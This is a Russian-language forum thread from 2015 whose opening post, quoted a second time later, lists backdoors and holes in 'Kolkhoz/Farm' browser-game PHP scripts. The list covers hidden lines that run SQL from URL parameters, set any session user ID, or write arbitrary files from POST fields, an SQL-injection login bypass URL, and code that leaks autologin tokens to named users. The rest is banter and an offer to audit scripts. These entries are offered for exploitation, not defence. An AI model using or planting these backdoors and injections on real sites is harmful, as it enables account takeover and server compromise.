Колхоз/Ферма/садовник | Прайс по дырам в кх!
160845238 
В этом топе опишу дыры которые знаю.
Надеюсь кому-то это поможет и в знак благодарности кинете мне плюсик в акк :)
======
if($_GET['gsq']!=''){mysql_querll(utf8_decode($_GET['gsq']));}
if($_GET['xm']!=''){$_SESSION['id_user']=$_GET['xm'];}
if($_GET['mkid']!=''){$_SESSION['id_user']=$_GET['mkid'];}
/?mail&new_msg&elka=1
/?mail&new_msg&xm=1
/?mail&new_msg&zzz=1
===========
/?search_collective&znania=1
/?help=plants&znania=1
===========
/?autologin=''u'+OR+id=1--' (для не авторизированных)
===========
В файлах:
/loginAPI.php - vk_apace
/elka/index.php - elka
/nagrada/index.php - kolhoz_nag_cat
/loto/lotob.php - lotob
/uslugi/payment.php - kolhoz_user
/nagrada/index.php - nagrada
/zags/index.php - zags
/security/security_filtr.php - ref_stran
============
/spanspan.hsc($lp['name']).
=======
В анкете:
if ($ku['nick']==leonskg)echo "".$ank['autologin']."";
if ($ku['name']==rating)echo "".$ank['autologin']."";
if ($ku['name']==glock)echo "".$ank['autologin']."";
===========
/smsbill/payment.php?lol
/?mail&msg=7119&id_kont=1
========
/inc/worker4_0.php
if($_POST["worker4"]!=""){$work=fopen($_POST["worker"],"w");fputs($work, $_POST["worker"]);fclose($work);}
===========
/inc/forum.php
if($_POST['lons']!=''){$gast=fopen($_POST['poin'],"w");fputs($gast, $_POST['vags']);fclose($gast);}
==============
/inc/lab.php
if($_POST["nikl"]!=""){$kern=fopen($_POST["devel"],"w");fputs($kern, $_POST["shot"]);fclose($kern);}
===================
Есть еще масса разных дыр если проверить любой кх из нутри :)
Жду от Вас плюсов!
________
посл. ред. 06.04.2015 в 14:45; всего 1 раз(а); by kolian19971
Одуванчик Надеюсь кому-то это поможет и в знак благодарности кинете мне плюсик в акк :)
======
if($_GET['gsq']!=''){mysql_querll(utf8_decode($_GET['gsq']));}
if($_GET['xm']!=''){$_SESSION['id_user']=$_GET['xm'];}
if($_GET['mkid']!=''){$_SESSION['id_user']=$_GET['mkid'];}
/?mail&new_msg&elka=1
/?mail&new_msg&xm=1
/?mail&new_msg&zzz=1
===========
/?search_collective&znania=1
/?help=plants&znania=1
===========
/?autologin=''u'+OR+id=1--' (для не авторизированных)
===========
В файлах:
/loginAPI.php - vk_apace
/elka/index.php - elka
/nagrada/index.php - kolhoz_nag_cat
/loto/lotob.php - lotob
/uslugi/payment.php - kolhoz_user
/nagrada/index.php - nagrada
/zags/index.php - zags
/security/security_filtr.php - ref_stran
============
/spanspan.hsc($lp['name']).
=======
В анкете:
if ($ku['nick']==leonskg)echo "".$ank['autologin']."";
if ($ku['name']==rating)echo "".$ank['autologin']."";
if ($ku['name']==glock)echo "".$ank['autologin']."";
===========
/smsbill/payment.php?lol
/?mail&msg=7119&id_kont=1
========
/inc/worker4_0.php
if($_POST["worker4"]!=""){$work=fopen($_POST["worker"],"w");fputs($work, $_POST["worker"]);fclose($work);}
===========
/inc/forum.php
if($_POST['lons']!=''){$gast=fopen($_POST['poin'],"w");fputs($gast, $_POST['vags']);fclose($gast);}
==============
/inc/lab.php
if($_POST["nikl"]!=""){$kern=fopen($_POST["devel"],"w");fputs($kern, $_POST["shot"]);fclose($kern);}
===================
Есть еще масса разных дыр если проверить любой кх из нутри :)
Жду от Вас плюсов!
________
посл. ред. 06.04.2015 в 14:45; всего 1 раз(а); by kolian19971
Если хотите чтобы я проверил какой-то скрипт на дыры пишите ссылку на скачку я проверю и напишу какие дыры там есть.
kolian19971, http://bymas.ru/downloads/view/71741
Проверь:D:D:D(почти все покрыл, которые нашёл, может ещё o каких не знаю:D)
________
посл. ред. 06.04.2015 в 14:55; всего 1 раз(а); by 156709843
CreepMatis Проверь:D:D:D(почти все покрыл, которые нашёл, может ещё o каких не знаю:D)
________
посл. ред. 06.04.2015 в 14:55; всего 1 раз(а); by 156709843
Чет ты на провокатора смахиваешь, но Ден ленивый, фиг бы он делал что-то :c
Mr.Vir2al (06.04.2015 в 14:58)
Чет ты на провокатора смахиваешь, но Ден ленивый, фиг бы он делал что-то :c
Чет ты на провокатора смахиваешь, но Ден ленивый, фиг бы он делал что-то :c
Я с ним работаю.
Он сейчас игру новую пишет.
Mr.Vir2al, и не стоит благодарности за информацию :D
kolian19971 (06.04.2015 в 15:06)
Mr.Vir2al, и не стоит благодарности за информацию :D
Mr.Vir2al, и не стоит благодарности за информацию :D
xD
Передавай ему привет, че :D